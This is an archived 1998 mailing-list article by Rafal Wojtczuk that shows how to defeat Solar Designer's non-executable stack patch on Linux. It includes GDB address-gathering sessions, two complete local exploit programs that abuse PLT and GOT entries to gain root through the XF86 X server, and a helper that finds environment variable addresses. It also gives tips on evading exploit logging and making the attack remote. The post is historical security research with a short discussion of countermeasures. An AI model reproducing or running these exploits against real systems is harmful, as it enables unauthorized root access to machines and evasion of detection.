Defeating Solar Designer non-executable stack patch

From: Rafal Wojtczuk (nergalat_private)
Date: Fri Jan 30 1998 - 09:09:35 PST

  • Next message: Aleph One: "pnserver exploit.."

           -=[ Defeating Solar Designer's Non-executable Stack Patch ]=-
        Text and souce code written by Rafal Wojtczuk ( nergalat_private )
      Section I. Preface
      The patch mentioned in the title has been with us for some time. No doubt it
    stops attackers from using hackish scripts; it is even included in
    just-released Phrack 52 as a mean to harden your Linux kernel. However, it
    seems to me there exist at least two generic ways to bypass this patch fairly
    easily ( I mean its part that deals with executable stack ). I will explain
    the details around section V.
      Before continuing, I suggest to refresh in your memory excellent
    Designer's article about return-into-libc exploits. You can find it at
             "I recommend that you read the entire message even if you aren't
             running Linux since a lot of the things described here are
             applicable to other systems as well."
                     from the afore-mentioned Solar Designer's article
      It is definitely worth your time to get acquainted with Designer's patch
    documentation ( which can be retrieved embedded in the complete package from ).
      All the following code was tested on Redhat 4.2 running 2.0.30 kernel with
    Designer's patch applied ( latest version, I presume ).
      Section II. A few words about ELF implementation
      Let's compile and disassemble the following proggie.c
    $ gcc -o proggie proggie.c
    ...lots of warnings...
    $ gdb proggie
    GDB is free software and you are welcome to distribute copies of it...
    (gdb) disass main
    Dump of assembler code for function main:
    0x8048474 <main>:       pushl  %ebp
    0x8048475 <main+1>:     movl   %esp,%ebp
    0x8048477 <main+3>:     pushl  $0x22222222
    0x804847c <main+8>:     pushl  $0x11111111
    0x8048481 <main+13>:    call   0x8048378 <strcpy>
    0x8048486 <main+18>:    addl   $0x8,%esp
    0x8048489 <main+21>:    leave
    0x804848a <main+22>:    ret
    0x804848b <main+23>:    nop
    End of assembler dump.
      As we can see, the call to strcpy hits text segment, not library function
    directly ( when Designer's patch is applied, libc functions have addresses
    that begin with 0x00 ).
    (gdb) (gdb) disass strcpy
    Dump of assembler code for function strcpy:
    0x8048378 <strcpy>:     jmp    *0x80494d8
    0x804837e <strcpy+6>:   pushl  $0x0
    0x8048383 <strcpy+11>:  jmp    0x8048368 <_init+8>
    End of assembler dump.
    (gdb) printf "0x%x\n", *0x80494d8
      Code starting at 0x8048378 is a part of procedure linkage table ( PLT ).
    Initially, int stored at 0x80494d8 ( member of global offset table, GOT )
    contains address of the next instruction ( here, strcpy+6 ). When the procedure
    is called for the first time, dynamic linker is involved in transferring
    control to the proper place in shared library image. Linker puts library
    function address into *0x80494d8 as well, so the next time strcpy is called,
    jmp    *0x80494d8 instruction will take it to the right spot in libc
      The previous paragraph is correct when lazy linking is performed, which is
    the default behaviour. By setting environ variable LD_BIND_NOW one can
    make the linker do the binding of all procedures before control reaches
    function main.
      Those ripped-out-of-context phrases are enough for the purposes of this
    article. You can find complete ELF specification at ( it contains file
    elf.hps ).
       Section III. A flaw no 1 - PLT entries
      The important fact is that we do not have to call libc functions directly.
    If the vulnerable application uses a procedure from shared library, the text
    segment will contain an appropriate procedure linkage table entry, which we
    can merrily use. For instance, if lpr used "system", then Solar Designer's
    exploit for lpr would work fine: instead of finding "system" in libc, we
    would use PLT entry ( a string "/bin/sh" can be smuggled into the program
    hidden in the enviroment or argv). But it is much worse than this...
      Section IV. A flaw no 2 - executable data segments
      Information stored in /proc/pid/maps is... ahm... not always accurate.
    Code can be executed in data segment, even if you issue
    mprotect(...,...,PROT_READ) call. In fact, it can be bare PROT_WRITE or
    PROT_EXEC as well; standard shellcode will not work, because it modifies
    itself ( segfault when PROT_READ|PROT_EXEC ) and passes arguments located
    inside its body to the kernel ( when only PROT_WRITE is applied, kernel
    function verify_area will fail ). It is trivial to write a working shellcode.
    Anyway, data segments are rw ( malloc-ed data even rwx ), so a standard
    shellcode will do.
      Impact: We can transfer control to the shellcode if it has been copied to
    data segment. Sometimes application will do it for us; but in fact, when a
    buffer overflow in automatic data is involved, we don't need any farther
      Section V. Exploit no 1
      For the rest of the article, I will assume that the vulnerable program we
    attack uses strcpy or sprintf. 99% does; if it IS vulnerable, then odds are
    100% ;). I will use strcpy; sprintf(dest,src) works identically provided
    there is no % neither \ in src argument.
      Our exemple target will be XF86 Xserver; its case was discussed on bugtraq
    a while ago. You can find details there.
      Exploit goes as follows: we fill a buffer with the pattern
    ------------------------------   <------------- stack grows this way
    | STRCPY | DEST | DEST | SRC |
    ------------------------------   memory addresses grow this way ------->
    where STRCPY is an address of strcpy PLT entry
          DEST is a place in a data segment where we will place shellcode
          SRC points into a environ variable containing a shellcode
      We want to overwrite return address on the stack with STRCPY field; then
    strcpy will copy shellcode to DEST. Instruction ret from strcpy will pop the
    first DEST, and control will be passed there.
      Let's gather some info then. We will need a non-suid copy of X server;
    if it is mode rws--x--x on your system, you can get it from
    and enjoy :) It must be exactly the same version,though.
    $ gdb myX
    ... lots of stuff ...
    (gdb) p strcpy
    $1 = {<text variable, no debug info>} 0x8066a18 <strcpy> <-- first number we need
    (gdb) b main
    Breakpoint 1 at 0x80df5e8
    (gdb) r
    Starting program: myX
    warning: Unable to find dynamic linker breakpoint function.
    warning: GDB will be unable to debug shared library initializers
    warning: and track explicitly loaded dynamic code.
    (no debugging symbols found)...(no debugging symbols found)...
    (no debugging symbols found)...(no debugging symbols found)...
    Breakpoint 1, 0x80df5e8 in main ()
      In another window (1515 is the pid of X server )
    $ cat /proc/1515/maps
    00110000-00115000 rwxp 00000000 03:07 20162
    00115000-00116000 rw-p 00004000 03:07 20162
    00116000-00117000 rw-p 00000000 00:00 0
    00118000-0011e000 r-xp 00000000 03:07 20171
    0011e000-00120000 rw-p 00005000 03:07 20171
    00120000-00122000 rwxp 00000000 03:07 20169
    00122000-00123000 rw-p 00001000 03:07 20169
    00123000-001b6000 r-xp 00000000 03:07 20165   <-- libc is mapped here
    001b6000-001bc000 rw-p 00092000 03:07 20165
    001bc000-001ee000 rw-p 00000000 00:00 0
    08048000-08223000 r-xp 00000000 03:07 50749
    08223000-08230000 rw-p 001da000 03:07 50749   <-- here resides data; our second number is found
    08230000-08242000 rwxp 00000000 00:00 0       <-- these addresses would do as well
    bfffe000-c0000000 rwxp fffff000 00:00 0       <-- and these wouldn't ;)
    BTW, if you execute
    $ ls -i /lib/
      20165 /lib/
    and look at maps file contents, you can see where libc is mapped; we will
    need this piece of info for the second exploit.
      Last hint - X server uses file descriptor 0 for its own purposes, so instead
    of spawning a root shell we will execute a program in /tmp/qq ( which should
    make a root suid copy of bash ).
    Now kill gdb session, compile and run the following
    Exploit no 1 for Solar Designer patch
    by nergalat_private
    This code is meant for educational and entertaining purposes only.
    You can distribute it freely provided credits are given.
    #include <stdio.h>
    /* change the following 0 if the code doesn't work */
    #define OFFSET                          0
    #define BUFFER_SIZE                     370
    #define EGG_SIZE                        2048
    #define NOP                             0x90
    /* any address in data segment */
    #define DEST                            0x08223038
    /* strcpy linkage table entry */
    #define STRCPY                          0x08066a18
    char shellcode[] =
    char buf[BUFFER_SIZE];
    char egg[EGG_SIZE];
    char pattern[16];
    void main(int argc, char **argv)
    /* try alignment in 3..18; three worked for me */
            int i, align = 3;
            int src = (int) &src - OFFSET;  /* formerly known as get_sp() :) */
            if (argc == 2)
                    align = atoi(argv[1]);
            *(int *) pattern = STRCPY;
            *(int *) (pattern + 4) = DEST;
            *(int *) (pattern + 8) = DEST;
            *(int *) (pattern + 12) = src;
            for (i = 0; i <= 15; i++)
                    if (pattern[i] == 0) {
                            printf("zero in pattern (%i)\n", i);
            memset(buf, ' ', BUFFER_SIZE);
            buf[BUFFER_SIZE - 1] = 0;
            buf[0] = ':';
            buf[1] = '9';
            for (i = align; i < BUFFER_SIZE - 16; i += 16)
                    memcpy(buf + i, pattern, 16);
            memset(egg, NOP, EGG_SIZE);
            strcpy(egg + EGG_SIZE - strlen(shellcode) - 2, shellcode);
            strncpy(egg, "EGG=", 4);
            execl("/usr/X11R6/bin/X", "X", buf, "-nolock", 0);
    end of exploit no 1
      In Designer exploits, a shell was invoked using "system" call, which after
    completion returns onto the stack ( and segfaults ). This caused exploit
    attempt logging. In exploit no 1 we execute our code using execve, so
    everything is clean and tidy.
      Section VI. Any solutions ?
      It doesn't look neat,is it ? Again, arbitrary code can be executed. What can
    we do ?
      First idea is to patch kernel so that instructions in data segment cannot be
    executed. Solar Designer patch does simply
    (retaddr & 0xF0000000) == 0xB0000000
    comparison to detect whether code is returning into stack; it would be a
    time-consuming job to check if we're returning into a data segment. Anyway,
    we are barking a wrong tree here. If we are satisfied with simple
    system("/tmp/evilcode"), we don't need executable data segment at all !
      Exploit no 2 is waiting for you. Certainly, sometimes you need to do
    setuid(0) or fcntl(fd,SET_FD,0) before "system", but usually not.
      Section VII. PLT reapears.
    We will fill a buffer with a pattern
    | STRCPY | STRCPY | PLTENT-offset | SRC |
    STRCPY is again a PLT entry for strcpy.
    PLTENT is an address of integer in GOT referenced by strcpy PLT entry ( in
    proggie.c example it was 0x80494d8 )
    SRC is a pointer into env variable.
      How does it work ? We need to hit return placeholder with first STRCPY.
    SRC contents will overwrite GOT entry so that it will contain address of libc
    "system" procedure. Second return into STRCPY will execute "system" (
    because instruction jmp *gotentry references place in memory we have just
    altered ) with argument SRC.
      Well, extreme precision is required here, because we overwrite linker vital
    internal structures. First, SRC has to be a valid filename ( starting
    with /tmp/xxxx, for instance). SRC's last 3 bytes must be the lowest 3 bytes of
    "system" procedure address. Zero terminating SRC will complete the address.
    Second, we need the exact address of SRC - src=&src certainly will not suffice.
      So,we start gathering info. We already have STRCPY; to obtain GOT integer,
    we need to disass strcpy with gdb ( like in proggie.c example ). From
    /proc/pid/maps we can extract address where libc is mapped; to compute "system"
    addres, we need to add its offset in libc.
    $ nm /lib/ | grep system
    0007ec7c T svcerr_systemerr
    00081d7c T system             <---- that's the number we need
    Now we compile the following code ( remember, /tmp/qq is a prog that makes a
    setuid shell or anything you find useful to do with euid 0)
    Exploit no 2 for Solar Designer patch
    by nergalat_private
    This code is meant for educational and entertaining purposes only.
    You can distribute it freely provided credits are given.
    #include <stdio.h>
    #define BUFFER_SIZE                     370
    #define EGG_SIZE                        100
    #define STRCPY                          0x08066a18
    #define PLTENT                          0x0822f924
    #define SYSTEM                          (0x00123000+0x81d7c)
    #define SRC                             0xbfffffe6
    char buf[BUFFER_SIZE];
    char egg[EGG_SIZE];
    char pattern[16];
    char prefix[] = "/tmp/xxxxxxx";
    char path[200];
    char command[200];
    void main(int argc, char **argv)
            int i, align = 3;
            char *envs[2] = {egg, 0};
            if (argc == 2)
                    align = atoi(argv[1]);
            *(int *) pattern = STRCPY;
            *(int *) (pattern + 4) = STRCPY;
            *(int *) (pattern + 8) = PLTENT - strlen(prefix);
            *(int *) (pattern + 12) = SRC;
            for (i = 0; i <= 15; i++)
                    if (pattern[i] == 0) {
                            printf("zero in pattern (%i)\n", i);
            if (!(SYSTEM & 0x00ff0000) || !(SYSTEM & 0x0000ff00) || !(SYSTEM & 0x000000ff)) {
                    printf("zero in system\n");
            memset(buf, ' ', BUFFER_SIZE);
            buf[BUFFER_SIZE - 1] = 0;
            buf[0] = ':';
            buf[1] = '9';
            for (i = align; i < BUFFER_SIZE - 16; i += 16)
                    memcpy(buf + i, pattern, 16);
            strcpy(path, prefix);
            *(int *) (path + strlen(path)) = SYSTEM;
            sprintf(egg, "EGG=%s", path);
            sprintf(command, "cp /tmp/qq %s", path);
            execle("./qwe", "X", buf, "-nolock", 0, envs);
    end of exploit no 2
      You've read the code ? Wonder what ./qwe is for ? Right. Remember we need
    exact address of /tmp/xxxxxxxsomething in memory. So, first make ./qwe a
    symlink to the following program:
    envi.c - displays addresses of all env variables
    #include <stdio.h>
    extern char ** environ;
            char ** p=environ;
            while (*p)
                    printf("0x%x %s\n",*p,*p);
    end of envi.c
      Now run exploit no 2. Note down address of /tmp/xxxxsomething in EGG
    variable ( NOT address of EGG=..., but address of /tmp/xxxx...; you must add
    strlen("EGG=") to the number envi.c produces ). Correct the value of SRC in
    exploit. Than make ./qwe symlink to /usr/X11R6/bin/X and run exploit again.
    That's all.
      Because we use "system", the name of binary (/tmp/xxxxsomething...) which
    will be executed may be not exactly what we put in our "path" variable. In my
    case, at offset 13 it contained a '|' char, which is a special character for
    shell, so "system" called out of X server tried to execute /tmp/xxxxxxx. It
    succeeded - we make /tmp/xxxxsomething a copy of /tmp/qq using "system" as
    well, so the result should be what we wished.
      After "system" call the program segfaults; but since the control doesn't
    return onto stack ( rather into GOT ) no exploit attempt is logged.
      Section VIII. More Feeble Screams From The Forests Unknown
      There are other methods to cope with non-executable stack. Consider the
    following scenario. The faulty code containing an overflow ends up executing
    strcpy, which overwrites the very same place on the stack it was called
    ( frankly, retted :)) from. The resulting stack can be formed so that it will
    spawn another strcpy...
    stack before first strcpy execution
    | junk|junk | src1 | dest1 | junk  | STRCPY| some junk                  |
           |                |              ^
           -----------------|              |
    stack just before first strcpy returns
    |junk | src2 |dest2| junk  | STRCPY|        | evil code 0-terminated    |
      This way we copied on the stack some arbitrary bytes terminated by 0. By
    repeating this operation, we can put any pattern, which may include zeros, on
    the stack. If we can find in text segment or in any library fragment of code
    that does
    subl $something, %esp
     %esp will be placed in the pattern we generated. Since then we can use
    any library functions, including setuid, mprotect etc.
      Section IX. Local vs remote exploit
      These two pieces of code are local. The idea of the first one can
    be materialized into a remote exploit; all we need is a copy of an attacked
    program to examine. Even all possible versions of it can be tried by a
    determined hacker. The second one requires a very high accuracy, which
    complicates the whole thing; not mentioning that we also
    a) need to know libc version used on the remote machine
    b) must be able to create there executable files with arbitrary suffix  ( anon
    ftp uploads spring to mind )
      Section X. Any solutions - continued
      Well, if
         a) we can protect data segments from being executed
         b) we force LD_BIND_NOW - like dynamic linking, which enables us to
            mprotect GOT non-writable
    both exploits will fail. However, I'm not convinced with this idea.
    Still unknown number of potentially dangerous library functions can be
    called through PLT; for instance, memccpy is worth mentioning, as it enables
    us to copy a block of memory containing 0's.
      The best solution would be to mmap text segment ( accompanied by PLT and
    GOT ) under 16MB boundary. But it's impossible, right ? Code of applications
    is not position independent.
      It's probably a linker issue, but if we can mmap PLT in the lowest 16MB,
    both my exploits will fail. However, we could still utilize "call system"
    instruction that may reside in the application body.
      Section XI. Closing unrelated bubbling
      I welcome any constructive comments regarding this article; hope you
    enjoyed reading it at least half as much as I enjoyed composing it...
                       "That's all for now.
                       I hope I managed to prove that exploiting buffer overflows
                       should be an art."
                             from the afore-mentioned Solar Designer's article
      lcamtuf, idziesz na piwo ?
      If you find that you can give me some security or linux related job, thus
    saving me from earning money for living by some hebetating activity,
    let me know. History will not forget your deed :) IBS folks, you listen ?
      More stuff from Nergal is coming soon; next time it will be something
    perhaps more useful, from a certain point of view ;) of course. Should still
    retain entertaining values.
           Save yourself,

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